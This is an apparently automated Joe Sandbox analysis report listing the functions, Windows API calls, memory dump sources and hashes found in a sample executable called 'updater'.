Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 8a1ec32e7bcc06f9afce3214cdc38c1e4614352e5176b6dec2c5072ab40ede65
Instruction ID: 6bf05f57fbeb02d419090bf28664ba7edb696f289b03754140fa13cce8e68ac1
Opcode Fuzzy Hash: 8a1ec32e7bcc06f9afce3214cdc38c1e4614352e5176b6dec2c5072ab40ede65
Instruction Fuzzy Hash: D6D017745207138FD726AF31D889796B6E8AF06392F16C86EE4D6E2160EB70D880CB11

Function 016DAF95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,016DB91E,00000000,016DB931), ref: 016DAF9B
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 016DAFAC

Strings

kernel32.dll, xrefs: 016DAF96
GetDiskFreeSpaceExA, xrefs: 016DAFA6

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 46c6a37ff34fb8b09bb9263bd3d1dae2569079f888a6a906a0b500ef6336e9ca
Instruction ID: fca4947e47d7cda5f3b45d9c5f3396570afa01d2d110b1215f2985cd6b8cb57c
Opcode Fuzzy Hash: 46c6a37ff34fb8b09bb9263bd3d1dae2569079f888a6a906a0b500ef6336e9ca
Instruction Fuzzy Hash: E1D09EE1F08301AAD7217EFABCC06152AA69714285B0425E9A1034F6C6DBB084359714

Function 0038E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0038E7A7
CharLowerBuffW.USER32(?,?), ref: 0038E7EA

Part of subcall function 0038DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0038DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0038E9EA
_memmove.LIBCMT ref: 0038E9FD

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 69ce576d7a19d1509d826c5a1bb809f9e9ed44168fd9dbb7065dee49a06697eb
Instruction ID: 94bf2bce84c79b04de1d2845f8233e45c4966bbe0fb8d43edb4137a2f2a4abd7
Opcode Fuzzy Hash: 69ce576d7a19d1509d826c5a1bb809f9e9ed44168fd9dbb7065dee49a06697eb
Instruction Fuzzy Hash: B3C18B756083119FC716EF28C48096ABBE4FF89714F0489AEF8999B351D731E945CF82

Function 0038877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 003887AD
CoUninitialize.OLE32 ref: 003887B8

Part of subcall function 0039DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00388A0E,?,00000000), ref: 0039DF71

VariantInit.OLEAUT32(?), ref: 003887C3
VariantClear.OLEAUT32(?), ref: 00388A94

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 71a42e4fecd4438b26cfe9647870ea3b07f3e7415e04d33032d80fde423f7b08
Instruction ID: 0905e22175a64bde47ca514c4b3e94e49ba7a3a3385e5a6aa4940c96d06cfe2d
Opcode Fuzzy Hash: 71a42e4fecd4438b26cfe9647870ea3b07f3e7415e04d33032d80fde423f7b08
Instruction Fuzzy Hash: 73A15A75204B019FDB16EF54C481B6AB7E4BF8C310F558889F9969B3A2DB34ED40CB92

Function 0036814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003A3C4C,?), ref: 00368308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003A3C4C,?), ref: 00368320
CLSIDFromProgID.OLE32(?,?,00000000,003A0988,000000FF,?,00000000,00000800,00000000,?,003A3C4C,?), ref: 00368345
_memcmp.LIBCMT ref: 00368366

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 87a5fa8912f3821640f3c447c6ed2635bd90b9ba05a7677486d20eb77110b292
Instruction ID: d669c7caeb9b5e3a65bc027619b55e7c9210d3ae1817723c4bfc553a600966e9
Opcode Fuzzy Hash: 87a5fa8912f3821640f3c447c6ed2635bd90b9ba05a7677486d20eb77110b292
Instruction Fuzzy Hash: 59813975A00109EFCB05DFD4C988EEEB7B9FF89315F208558E506AB254DB71AE06CB60

Function 0036749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003674AC
SysAllocString.OLEAUT32(00000000), ref: 00367555
VariantCopy.OLEAUT32 ref: 00367584
VariantClear.OLEAUT32(?), ref: 003675AB

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 985cbd7629fc4ba5ace66730163425a55f2b8f25d90d78d43c6b3074811284db
Instruction ID: 0ad189587ee25136921ae74d32b2b69c49e92abb2be5c8742f461ce33bcaae98
Opcode Fuzzy Hash: 985cbd7629fc4ba5ace66730163425a55f2b8f25d90d78d43c6b3074811284db
Instruction Fuzzy Hash: 8F51EB30608701DBDB269F79D895A6DF3E9AF49318F70C81FE546CB6A5EB309880CB15

Function 016EBCC5 Relevance: 6.2, APIs: 4, Instructions: 199libraryloadermemoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 016EBD5A
LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 016EBDF9
GetProcAddress.KERNEL32(00000000,?), ref: 016EBE5D
GetProcAddress.KERNEL32(00000000,?), ref: 016EBE74

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AddressProc$AllocLibraryLoadVirtual
String ID:
API String ID: 857568384-0
Opcode ID: b3da97192fce85c12d5aeb2b3be8641b10d27eb07adeb8da5693cdf76e6744ee
Instruction ID: bbf8909b3b525aabc5df695f442b78955c983c991e8e5a56442198642cec4b3a
Opcode Fuzzy Hash: b3da97192fce85c12d5aeb2b3be8641b10d27eb07adeb8da5693cdf76e6744ee
Instruction Fuzzy Hash: 7681CC71A002299FDB61CF28CC85BD9B7F5EF59310F0482E5EA89A7311D770AE918F94

Function 0038F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0038F526
Process32FirstW.KERNEL32(00000000,?), ref: 0038F534

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Process32NextW.KERNEL32(00000000,?), ref: 0038F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0038F603

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 72d39e2e0786cab685e5d39ca5dcdecc7cfb86707dcadccc40f55aa0ed3835e5
Instruction ID: b4f464e82050fed69c108733576fbba31cf43d96b7db3ee1125b2767042f4d05
Opcode Fuzzy Hash: 72d39e2e0786cab685e5d39ca5dcdecc7cfb86707dcadccc40f55aa0ed3835e5
Instruction Fuzzy Hash: 1A517FB15043119FD316EF24EC85EABB7E8EF99700F00492DF595DB291EB70A944CB92

Function 0033492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003349C0
__flush.LIBCMT ref: 003349E0
__write.LIBCMT ref: 00334A13
__flsbuf.LIBCMT ref: 00334A41

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 3de03f469ec78d1acca1cffcbce05d38ca4552c77130225d8ea1d3a8b1741f2c
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 6D41943160070AABDF2ACFA9C8D0A6F7BA9AF45360F25816DE8558B650D774FD408B44

Function 0036A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0036A68A
__itow.LIBCMT ref: 0036A6BB

Part of subcall function 0036A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0036A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0036A724
__itow.LIBCMT ref: 0036A77B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 79e695c2ddac694dce371eba786bee00a2accd0e3ba7e6509fe1bd88fdfd22a4
Instruction ID: 6c514dabc110c9cb0820f7ecbc4ed31f306fd01319cce931a93c72616a6fa367
Opcode Fuzzy Hash: 79e695c2ddac694dce371eba786bee00a2accd0e3ba7e6509fe1bd88fdfd22a4
Instruction Fuzzy Hash: E741B074A00618AFDF22EF54D886BEE7BB9EF54750F044029F905A7291DB709E44CBA2

Function 00387095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 003870BC
WSAGetLastError.WSOCK32(00000000), ref: 003870CC

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00387130
WSAGetLastError.WSOCK32(00000000), ref: 0038713C

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: e9be7ce652b05002bc2abd90ff4d964fb40058feba80129424d0599dc4692fb6
Instruction ID: e960dfb5b187391ef05c037eeacb935773422f5a4982b9f4d2bae4be01359434
Opcode Fuzzy Hash: e9be7ce652b05002bc2abd90ff4d964fb40058feba80129424d0599dc4692fb6
Instruction Fuzzy Hash: 3641B6717403006FEB1ABF24DC86F6A77E99B09B14F148458FA159F3C2D6749C418B91

Function 00386B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003A0980), ref: 00386B92
_strlen.LIBCMT ref: 00386BC4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 130c5bc7af1393ac07fbfab50306b4a9f12cb04206299d60ec78fc867c7c23ea
Instruction ID: 0845415c84108380f5c3f5661007d8f6bbec73908d3f00e75f8586ada5d8de2d
Opcode Fuzzy Hash: 130c5bc7af1393ac07fbfab50306b4a9f12cb04206299d60ec78fc867c7c23ea
Instruction Fuzzy Hash: 2541C671600214ABC71AFBA4DDD6EAEB7BDEF58310F148195F81A9F292DB30AD41C790

Function 016DCDA1 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 016DCE50
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 016DCE6C
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 016DCEE3
VariantClear.OLEAUT32(?), ref: 016DCF0C

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
Instruction ID: 0156c667e6922f6851a45f26464d1a264e7e019c0093d8162a08e1c3867c63f0
Opcode Fuzzy Hash: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
Instruction Fuzzy Hash: D44108B6E0021E8FCB62DB59CC90BC9B7BDAF59600F0041D9E649E7216DA30AF85CF54

Function 00398E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00398F03

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ef95d5abb8b2346dd1cc960c6ad4d425d40f5ec4980e95c8d01ff398e197904c
Instruction ID: 0d2f6965c00fe6a8084fecf869a5aa6a7345a6e2d22a832e0e5081eda4bcca32
Opcode Fuzzy Hash: ef95d5abb8b2346dd1cc960c6ad4d425d40f5ec4980e95c8d01ff398e197904c
Instruction Fuzzy Hash: D931F231605108AEEF279B18EC49FAC37AAEB87320F145502FA42D61E0DF71E950CA51

Function 016D98AD Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 016D98C9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 016D98ED
GetModuleFileNameA.KERNEL32(00310000,?,00000105), ref: 016D9908
LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 016D99AC

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 3024b2dd785d3ffd752ec428e0296d5234904f600a893bbf9b22ca97bc5ece32
Instruction ID: d4253d9dd8c00ee3139aa3c3e763c5ea833137c5da1fb28ae928cb33365bbe6f
Opcode Fuzzy Hash: 3024b2dd785d3ffd752ec428e0296d5234904f600a893bbf9b22ca97bc5ece32
Instruction Fuzzy Hash: 35412A71E002599FDB21DB68CC84BDDB7F9AB18304F4440EAA908EB340E7719F848F55

Function 016D98AB Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 016D98C9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 016D98ED
GetModuleFileNameA.KERNEL32(00310000,?,00000105), ref: 016D9908
LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 016D99AC

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 7d47e8d62e98873f072dc87270e5dd4c125ebe9918b3ece34d118c10fd4e2df3
Instruction ID: 835902d64ece4c4a91b64053af801ac8f8d646e5e279cc4f62b151beeec7efb0
Opcode Fuzzy Hash: 7d47e8d62e98873f072dc87270e5dd4c125ebe9918b3ece34d118c10fd4e2df3
Instruction Fuzzy Hash: A2412D70E002599FDB21DB68CC84BDDB7F9AB18305F4440EAA908EB350E7719F858F55

Function 0039B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(01561070,?), ref: 0039B1D2
GetWindowRect.USER32(?,?), ref: 0039B248
PtInRect.USER32(?,?,0039C6BC), ref: 0039B258
MessageBeep.USER32(00000000), ref: 0039B2C9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e91c4ccfd5daabb28a8ee19235ec4984aefcfc83e93af11ec355e7f2e7e4e470
Instruction ID: 6aef00bee2a75758c93d927157fd94ac8a9d0aa159793a99be275e219fe7b2f9
Opcode Fuzzy Hash: e91c4ccfd5daabb28a8ee19235ec4984aefcfc83e93af11ec355e7f2e7e4e470
Instruction Fuzzy Hash: 3641A030A04115DFDF13CF98EA85AADBBF9FF49350F1588A9E8989B260D330A941CF50

Function 003712D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00371326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00371342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003713A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003713FA

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 91185bb6c73e1e2d10280a786ea4d2c379ab3602ecb7ae989e1dbe72b3889f9a
Instruction ID: dabec933f931ce68d7f68ff18db35c79834e4c35b436cc87d1da60ed9c0cbf36
Opcode Fuzzy Hash: 91185bb6c73e1e2d10280a786ea4d2c379ab3602ecb7ae989e1dbe72b3889f9a
Instruction Fuzzy Hash: 1D314B36A44208AEFF378A2D8C09BFE7BB9AB45310F04C21AF498569D1D37C89419B51

Function 00371410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00371465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00371481
PostMessageW.USER32(00000000,00000101,00000000), ref: 003714E0
SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00371532

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: dc33baa3348e85967403ebfb037248009423c276bddfb38a64705836b936afea
Instruction ID: aac2b7c9d612fc9b05371b1f0ed2f35c445b5c3bc80633359b3d924f7a5280fd
Opcode Fuzzy Hash: dc33baa3348e85967403ebfb037248009423c276bddfb38a64705836b936afea
Instruction Fuzzy Hash: BA316232D402485EFF3B8B6E8C057FAB779AB86320F05C31AE489521D1C37C8D459B61

Function 016DA9C5 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON

Download Yara Rule

APIs

GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 016DAABF
GetThreadLocale.KERNEL32 ref: 016DA9EF

Part of subcall function 016DA94D: GetCPInfo.KERNEL32(00000000,?), ref: 016DA966

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: aae26b3094b99dfdbb5e3ab06d62829eaabe90022cef91cccd1bc218974345f5
Instruction ID: f353fd8c705dc785d63c3facc8116ca0dcce6318004de26a68c3423534853d31
Opcode Fuzzy Hash: aae26b3094b99dfdbb5e3ab06d62829eaabe90022cef91cccd1bc218974345f5
Instruction Fuzzy Hash: AA315E31E083658EE320DFE8AC017A63FEB9B11344F088259D98D8F385DB374555CB66

Function 003463F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0034642B
__isleadbyte_l.LIBCMT ref: 00346459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00346487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003464BD

Memory Dump Source

